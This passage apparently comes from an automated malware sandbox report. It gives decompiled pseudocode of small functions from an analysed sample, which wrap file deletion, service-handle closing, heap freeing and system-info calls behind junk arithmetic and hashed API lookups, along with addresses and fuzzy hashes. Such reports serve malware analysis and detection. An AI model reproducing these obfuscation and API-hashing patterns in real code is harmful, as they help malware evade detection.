				_v8 = _v8 + 0x125d;
				_v8 = _v8 ^ 0xc5f8b599;
				_t22 = E007007A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
				return _t23;
			}










                                          0x00709a5f
                                          0x00709a63
                                          0x00709a68
                                          0x00709a72
                                          0x00709a7b
                                          0x00709a82
                                          0x00709a89
                                          0x00709a90
                                          0x00709a97
                                          0x00709a9e
                                          0x00709ab7
                                          0x00709ac0
                                          0x00709ac6

                                          APIs
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00709AC0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: InfoNativeSystem
                                          • String ID:
                                          • API String ID: 1721193555-0
                                          • Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                          • Instruction ID: 45bfdd3a429212a69a8ceb7245ab464e2c48ee7041654c62e186cd5d94a27015
                                          • Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                          • Instruction Fuzzy Hash: 03F037B1901218FFEB08DB94D94A8DEBAB8EF42324F208188F40466240E7B51F548BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0070AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0070AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E007007A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0070aa3f
                                          0x0070aa40
                                          0x0070aa41
                                          0x0070aa44
                                          0x0070aa47
                                          0x0070aa4b
                                          0x0070aa4c
                                          0x0070aa51
                                          0x0070aa5b
                                          0x0070aa64
                                          0x0070aa68
                                          0x0070aa6f
                                          0x0070aa76
                                          0x0070aa8d
                                          0x0070aa90
                                          0x0070aa9d
                                          0x0070aaa8
                                          0x0070aaad

                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0070AAA8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                          • Instruction ID: f07317842d7f1cfa12af78b307ad7322b6e04794baad9ec54bf25dacedc686a1
                                          • Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                          • Instruction Fuzzy Hash: DFF069B190020CFFDF08DF94DD4A99EBFB5EB41304F108188F905A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E006F5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E007007A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x006f5fb5
                                          0x006f5fb6
                                          0x006f5fb7
                                          0x006f5fbb
                                          0x006f5fbc
                                          0x006f5fc1
                                          0x006f5fcb
                                          0x006f5fd7
                                          0x006f5fde
                                          0x006f5fe5
                                          0x006f5ffc
                                          0x006f5fff
                                          0x006f6006
                                          0x006f600d
                                          0x006f601a
                                          0x006f6025
                                          0x006f602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006F6025
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                          • Instruction ID: 769c5e9c67a2d742db81df34c261f847074929c25c9e5cfca6dcae3568ff5524
                                          • Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                          • Instruction Fuzzy Hash: B1F03CB0811208FFDB48DFA0E94689EBFB9EB40300F208198E509A7260E7755F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007008F3, Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E007008F3(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, void* _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t25;
				int _t30;

				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t25);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x46cbed;
				_v20 = 0x1c9af6;
				_v12 = 0xe082;
				_v12 = _v12 ^ 0xd02c06b1;
				_v12 = _v12 ^ 0xd02caa6a;
				_v8 = 0x35e8;
				_v8 = _v8 + 0xc4cf;
				_v8 = _v8 | 0x01443563;
				_v8 = _v8 ^ 0x0144db01;
				E007007A9(0x1da2f3a3, 0x9164b7cc, __ecx, __ecx, 6);
				_t30 = HeapFree(_a16, 0, _a8); // executed
				return _t30;
			}










                                          0x007008f9
                                          0x007008fc
                                          0x007008ff
                                          0x00700901
                                          0x00700904
                                          0x00700908
                                          0x00700909
                                          0x0070090e
                                          0x00700915
                                          0x00700921
                                          0x00700928
                                          0x0070092f
                                          0x00700936
                                          0x0070093d
                                          0x00700944
                                          0x0070094b
                                          0x00700952
                                          0x00700968
                                          0x00700978
                                          0x0070097d

                                          APIs
                                          • HeapFree.KERNEL32(0046CBED,00000000,00000000), ref: 00700978
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: f42bd0ef6022b4f02df29764bbac16bfa4de81bff675cec10e0bdee2996b28b4
                                          • Instruction ID: 6ae2b4cbdf856222676fdc8a3f7c3e15fe1b293487186bc8155f827b9040bd65
                                          • Opcode Fuzzy Hash: f42bd0ef6022b4f02df29764bbac16bfa4de81bff675cec10e0bdee2996b28b4
                                          • Instruction Fuzzy Hash: AE015EB580020CFFEF05DFD4C946B9E7FB5AF44708F108188B904662A1D3B65B249B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions